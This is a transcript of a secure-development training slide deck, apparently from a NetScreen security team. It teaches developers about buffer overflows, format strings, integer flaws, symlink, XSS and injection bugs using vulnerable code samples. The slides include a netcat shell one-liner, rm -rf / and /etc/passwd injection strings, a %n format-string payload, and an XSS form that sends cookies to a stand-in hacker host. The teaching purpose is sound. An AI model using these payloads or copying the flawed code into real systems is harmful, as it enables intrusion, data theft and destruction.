How To Avoid PCI Pitfalls in Keeping Your SAP® System Compliant and Secure
Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.
-
date post
22-Dec-2015 -
Category
Documents
-
view
215 -
download
2
Transcript of Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.
![Page 1: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/1.jpg)
Secure Product Development
How to avoid being 0wnz0r3d by 31337 h4x04z.
![Page 2: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/2.jpg)
Security Team Introduction Part of service group Respond to NetScreen product flaws Audit security of NetScreen products Provide security knowledge to R&D Create/maintain IDP signatures Create/maintain hardened OS images
![Page 3: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/3.jpg)
Why Worry About Security?
We sell a security product Embarrassment Loss of revenue Patch releases are inefficient Save Security Team work
![Page 4: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/4.jpg)
Why Security Flaws Exist
Security is hard! Lack of education Lack of priority/schedule No liability laws (yet) C, the cursed language
![Page 5: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/5.jpg)
Designing a Secure Product
Security from the beginning Clear security requirements Multiple layers of security Review issues in similar products Allow time for security
![Page 6: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/6.jpg)
Developing a Secure Product
Training/experience Think like a hacker Never ever trust input Check data obsessively Code reviews
![Page 7: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/7.jpg)
Testing a secure Product
Allocate time for security testing Be mean (breaking things is your job) Think like a hacker Test for common flaws
![Page 8: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/8.jpg)
Common Flaws - BOFs
Buffer overflow Most common serious flaw Mostly problem in C libc functions usually at fault
![Page 9: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/9.jpg)
Buffer Overflows - Cont. Text Segment
where executable code is stored
cannot be written to Heap
where malloced memory is located
Stack stores
• local variables• stack frames
grows down
![Page 10: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/10.jpg)
Buffer Overflows - Cont. Stack Frame
Tracks function calls Saved Frame Pointer
• points to the FP of the calling function
Return Address• contains address of code of calling function
• this is the next line-of-code executed after a return statement
Local Variables
![Page 11: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/11.jpg)
Buffer Overflows - Cont. Example of a Stack
Buffer Overflow
void main(int argc, char **argv){ foo(argv[1]);}
void foo(char *str){ int a; char c[16];
strcpy(c, str);
return;}
![Page 12: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/12.jpg)
Buffer Overflows - Cont. Use Example:
# ./program “hello”
![Page 13: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/13.jpg)
Buffer Overflows - Cont. Use Example:
# ./program “AAAAAAAAAAAAAAAAAAAAAAAAAAAA”
(that’s 28 As)
Return Address is now “AAAA” or 0x41414141!
![Page 14: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/14.jpg)
Buffer Overflows - Cont. Use Example:
# ./program “AAAAAAAAAAAAAAAAAAAAAAAA0xc0778012”
Return Address is now 0xc0778012on function return, program starts
executing c[0]Since we control what goes in c[], we
now control the program!
![Page 15: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/15.jpg)
Buffer Overflows - Cont. What can a h4x0r do now?
Crash the machine (DoS) Destroy data (rm -rf /) Install a trojan (subseven, backorifice) Spawn a shell (nc -l -p 5000 | sh)
On a NetScreen? DoS (crash) most common result Overwrite the policy with garbage? Modify the policy to allow access? Execute arbitrary ScreenOS commands?
![Page 16: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/16.jpg)
Buffer Overflows - Cont. Heap overflows Can modify variable values
logged_in = 1 is_superuser = 1
Code execution Harder than stack overflows Only works on some systems Overwrites malloc headers This is a very complex attack
![Page 17: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/17.jpg)
Dangerous libc Functions The worst
strcpy strcat sprintf, vsprintf gets strlen scanf, sscanf, fscanf,
vscanf, vsscanf
Some others realpath getopt getpass streadd strecpy strtms getwd
![Page 18: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/18.jpg)
Format String Flaws Caused by improper use of *printf
functions printf(str) instead of printf(“%s”, str)
%n argument writes to stack Use field widths to increase value (e.g.
%100d) Use multiple %n (one for each byte)
![Page 19: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/19.jpg)
Format String Exampleint main(int argc, char **argv){ char str[256];
scanf(“%256s”, str); //look ma, no overflow! printf(str);}
# ./programAAAA%08x%08x%08x%08x%08x%n
We’ve overwritten memory @ 0x41414141. Replace AAAA with your return address, or any other data structure location
![Page 20: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/20.jpg)
Format Strings - Cont.
What can a hacker do now? Take control of program (overwrite return
address) Dump memory using %s or %x Modify arbitrary data structures
• logged_in = 1 Crash the program (write to bogus address,
SEGFAULT)
![Page 21: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/21.jpg)
Format Strings - Cont. Dangerous functions
• fprintf• printf• sprintf• snprintf• vfprintf• vsprintf• vsnprintf• syslog• others (err*, verr*, warn*, vwarn*)• your own logging functions
![Page 22: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/22.jpg)
Integer Flaws
Even integer math can contain flaws Sign mistakes Integer overflows
![Page 23: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/23.jpg)
Integer Sign Flaws
Relatively common Have to check function prototypes (unsigned int)-1 = 4,294,967,295 Hard to exploit Apache chunked encoding vulnerability
![Page 24: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/24.jpg)
Integer Sign Flaw - Examplevoid foo(int len, char *src){ buf[256]; if(len > 256) { //no overflows allowed! printf(“error!”); return; }
memcpy(buf, src, len); printf(“ok!”);}
foo(7, “hello”); -- ok!foo(500, ...); -- error!foo(-1, ...); -- SEGFAULT
![Page 25: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/25.jpg)
Integer Overflows
What happens when an int gets too big? 4,294,967,295 + 1 = 0 All integer math is mod 2^32 No way to tell this has happened
![Page 26: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/26.jpg)
Integer Overflow Exampleint* arraydup(int *array, unsigned int n){
int *newarray = malloc(n * sizeof(int));
int i;
for(i = 0; i < n; i++){
newarray[i] = array[i];
}
return newarray;
}
if n = 1073741824, n * sizeof(int) = 4294967296 = 0
![Page 27: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/27.jpg)
Integer Overflow Example(2)char *strcat(char *str1, uint len1, char *str2, uint
len2)
{
char *newstr = malloc(len1 + len2);
memcpy(newstr, str1, len1);
memcpy(newstr + len1, str2, len2);
return newstr;
}
if len1 = len2 = 0x80000000, len1 + len2 = 0x0100000000 = 0
result: SEGFAULT
![Page 28: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/28.jpg)
/tmp Attacks
Can happen when filename is predictable Attacker can symlink file to anything Not just /tmp Solution: use tempnam, etc.
![Page 29: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/29.jpg)
/tmp Attacks - Examplevoid main(){ int fd = creat(“/tmp/foo”, O_RDRW);
write_temp_data(fd);}
Attacker can symlink /tmp/foo to some other file owned by the process UID. You’re not root are you?
/etc/passwd/var/firewall/policy.txt
if attacker can control what is written, could be even worse attack
![Page 30: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/30.jpg)
Cross-Site Scripting HTML/javascript attack Way to trick other users Can Occur whenever user-provided data
is displayed (NetScreen FW Logs) Very difficult to block, script can be
entered many ways Only allow good characters, don’t try to
block bad
![Page 31: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/31.jpg)
Cross-Site Scripting - Example<?php
print “Welcome $username\n”;
?>
What if username was:
<form action=www.hacker.com/gather.cgi><input type=hidden name=cookie onLoad=“value=document.cookie; form.submit();”></form>victim
Victim would see “Welcome victim!” but their cookie was just stolen.
Can be made less conspicuous by using URL encodings, e.g.:
/login.php?username=<form...
can look like:
/login.php?%75%73%65%72%6e%61%6d%65%3d%3c%66%6f%72%6d...
![Page 32: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/32.jpg)
Command/SQL Injection
Can occur whenever commands are executed
Also in all SQL statements Prematurely end statement, add 2nd
statement Don’t filter out bad characters, only allow
good characters
![Page 33: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/33.jpg)
Command Injection - Example#!/bin/perl
#Web-based finger gateway
$user = $form[user];
@output = `/bin/finger $user`;
print @output;
What if $form[user] was “foo; rm -rf /” or “foo; cat /etc/passwd”?
The ‘;’ terminates the 1st command, begins 2nd command.
Not only ‘;’, some shells allow &&, ||, etc.
![Page 34: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/34.jpg)
SQL Injection - Examplevoid insert_log(char *user, char *log){
db->insert(“insert into log values(%s, %s)”, user, log);
}
What if log was: “executed command: foo); truncate table log;”
(presumably the attacker typed “foo); truncate table log;” at the prompt
or this: “update userdb set password=$passwd where user=$user;”
What if $user was “attacker or user like ‘admin’”
The attacker just set the admin’s password!
![Page 35: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/35.jpg)
Summary
Plan for security Always keep security in mind For developers:
Never trust input Check everything Only allow valid data Be familiar with common security flaws
![Page 36: Secure Product Development How to avoid being 0wnz0r3d by 31337 h4x04z.](https://reader036.fdocuments.in/reader036/viewer/2022062715/56649d775503460f94a5a03a/html5/thumbnails/36.jpg)
Thank You
You’ve just made our job easier.